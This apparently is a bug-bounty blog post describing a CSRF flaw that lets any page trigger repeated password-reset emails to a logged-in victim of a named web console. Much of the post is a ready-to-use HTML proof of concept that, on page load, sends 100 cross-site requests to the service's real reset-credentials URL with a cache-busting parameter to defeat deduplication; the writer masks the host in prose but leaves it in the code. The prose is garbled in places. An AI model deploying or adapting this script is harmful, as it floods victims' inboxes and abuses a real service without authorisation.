Email Flooding Without Knowing Victim Email Via CSRF
🔱‼️#ॐ_Har Har Mahadev_ #ॐ ‼️🔱
I’m Shuvo Kumar Saha , a security researcher and a bug bounty hunter from Bangladesh.
In this blog, I will share an interesting bug I discovered last month on a website. The bug revolves around how I can email flooding without knowing victim email via crsf.
Let’s Start
This bug raises when user login account and go injection CSRF payload web this bug trigged. There is no need-to-know which victim account email address, this bug trigged when user login and account open on victim browser. There is main problem, targeted website mechanisms that if user login and one url forget get request run on vicktim browser it fatch email from victim logined account send to server.
url like : https://con.target.tech/realms/prod-realm/login-actions/reset-credentials?client_id=target-console&tab_id=ramdom-id
In this url have 2 params none of them validate on server side. so my hacker mind hit me. let’s Do somethings, Then I use customize csrf code that send 100 times request just when victim go csrf injected side.
Here is code :
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF PoC</title>
<script>
function sendCSRFRequests() {
const targetURL = "https://console.neon.tech/realms/prod-realm/login-actions/reset-credentials?client_id=neon-console&tab_id=jgnRsc-wPWM";
for (let i = 0; i < 100; i++) {
const img = new Image();
img.src = `${targetURL}?nocache=${Math.random()}`; // Unique URL to bypass deduplication
}
}
</script>
</head>
<body onload="sendCSRFRequests()">
<h1>CSRF PoC</h1>
<p>Requests are sent automatically when the page loads.</p>
</body>
</html>after do everythings result :
I report it on private program they close it as informative.
Then I cleaify with some word.
Cheers✌️and thanks for Reading at the end of this Article.
🧑💻 Connect With Me Linkdin & X
🌐 Subscribe to Youtube Channel 0xshuvo for intermediate to advanced content.
